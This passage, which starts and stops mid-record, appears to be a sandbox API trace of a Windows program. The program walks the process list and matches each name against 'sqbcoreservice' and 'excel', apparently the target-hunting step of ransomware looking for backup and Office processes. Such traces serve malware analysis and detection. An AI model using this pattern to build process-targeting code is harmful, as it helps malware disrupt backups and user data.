returned="conhost.exe" [0096.314] StrStrIA (lpFirst="conhost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.314] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.315] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35771c8 [0096.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35771c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.315] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0096.315] StrStrIA (lpFirst="conhost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.316] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0096.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.317] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577210 [0096.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3577210, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0096.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0096.317] StrStrIA (lpFirst="rxodge.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.317] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.318] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35771e0 [0096.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35771e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0096.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0096.318] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.318] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0096.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.319] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575e00 [0096.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3575e00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0096.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0096.319] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.319] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0096.320] CloseHandle (hObject=0x358) returned 1 [0096.320] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0096.339] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.340] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575e20 [0096.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3575e20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0096.341] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0096.341] StrStrIA (lpFirst="[System Process]", lpSrch="excel") returned 0x0 [0096.341] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0096.342] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574d70 [0096.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574d70, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0096.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0096.342] StrStrIA (lpFirst="System", lpSrch="excel") returned 0x0 [0096.342] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.343] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577150 [0096.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3577150, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0096.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0096.343] StrStrIA (lpFirst="smss.exe", lpSrch="excel") returned 0x0 [0096.343] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.344] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577288 [0096.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3577288, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.344] StrStrIA (lpFirst="csrss.exe", lpSrch="excel") returned 0x0 [0096.344] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.345] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577240 [0096.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3577240, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0096.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0096.345] StrStrIA (lpFirst="wininit.exe", lpSrch="excel") returned 0x0 [0096.345] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.347] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577258 [0096.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3577258, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.347] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.347] StrStrIA (lpFirst="csrss.exe", lpSrch="excel") returned 0x0 [0096.347] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.348] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576fa0 [0096.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3576fa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0096.348] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0096.348] StrStrIA (lpFirst="winlogon.exe", lpSrch="excel") returned 0x0 [0096.348] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.349] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576fb8 [0096.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3576fb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0096.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0096.349] StrStrIA (lpFirst="services.exe", lpSrch="excel") returned 0x0 [0096.349] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.350] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576fd0 [0096.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3576fd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0096.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0096.350] StrStrIA (lpFirst="lsass.exe", lpSrch="excel") returned 0x0 [0096.350] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.351] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576fe8 [0096.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.351] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.351] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.351] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.352] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577000 [0096.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577000, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.352] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="excel") returned 0x0 [0096.352] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.354] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577090 [0096.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577090, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.354] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.354] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="excel") returned 0x0 [0096.354] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.355] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35770c0 [0096.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35770c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.355] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.355] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.356] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d20 [0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574d20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0096.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0096.356] StrStrIA (lpFirst="dwm.exe", lpSrch="excel") returned 0x0 [0096.356] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.357] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35770d8 [0096.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35770d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.358] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.358] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.359] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577468 [0096.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.359] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.359] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.359] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.361] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35773f0 [0096.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35773f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.361] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.361] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.361] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.363] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35772b8 [0096.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35772b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.363] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.363] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.363] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.364] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577480 [0096.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", 